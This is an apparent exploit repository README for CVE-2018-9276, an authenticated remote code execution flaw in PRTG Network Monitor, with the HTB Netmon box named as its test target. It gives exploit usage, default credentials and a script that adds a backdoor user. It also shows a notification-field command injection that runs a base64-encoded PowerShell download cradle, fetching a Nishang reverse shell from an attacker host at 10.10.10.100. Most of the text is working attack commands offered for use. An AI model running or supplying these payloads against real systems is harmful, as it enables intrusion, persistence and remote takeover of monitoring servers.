CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)# CVE-2018-9276
CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)
# Dependancies
* Impacket (python3 version)
* Netcat
* Msfvenom
# Usage
```
git clone https://github.com/A1vinSmith/CVE-2018-9276.git
./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
```
1. The credentials are needed for performing the exploit. Try default credentials `prtgadmin:prtgadmin`. And It might be worth checking the database or log to gain them. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
2. Try `--lport 445` if the port has not been occupied
3. There are few twisted comments in the code. They might need some modifications.
4. It might take few attempts to succeed. Reboot a target machine is always a good option. Especially when your payload causes some impact.
# Test coverage
HTB Netmon box
```
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA362
Original Install Date: 2/3/2019, 7:05:45 AM
System Boot Time: 7/28/2021, 9:02:41 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
```
# Credit
A Big Thank you for wildkindcc's python2 version https://github.com/wildkindcc/CVE-2018-9276
# Expand Knowledge
### Using metasploit
https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/
### Remote Code Execution
https://www.exploit-db.com/exploits/46527
https://github.com/chcx/PRTG-Network-Monitor-RCE
##### Usage sample
The credentials are needed for performing the exploit. First login and get the authenticated cookie to add a new user.
```
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"
// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10
```
### Advanced manually exploit without adding new user
##### Credit belong to HTB offical writeup
###### POC: https://www.codewatch.org/blog/?p=453 Plus using SMB to get reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB
In case we don’t want to add a user, for better OPSEC we can get a reverse shell. However due to HTML encoding many characters get encoded. We can bypass this using powershell base64 execution. We need to create a base64 encoded command. However, it should be in the encoding which WIndows uses i.e `UTF-16LE`
```
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0
SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
```
We use iconv to convert it to target encoding and will execute this reverse shell from Nishang.
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Download the script and echo in the command to the last line.
```
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1
```
Now start a simple HTTP server and create a new notification
```
python3 -m http.server 80
```
Click on Setup > Account Settings > Notifications -> click on “Add new notification” on the extreme right
Trigger the notification by clicking the Bell button
```
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
```
[4.0K] /data/pocs/b3bc1f2416b1985c953dcad9df7f3102109d8ef5
├── [ 16K] exploit.py
├── [1.0K] LICENSE
└── [4.0K] README.md
0 directories, 3 files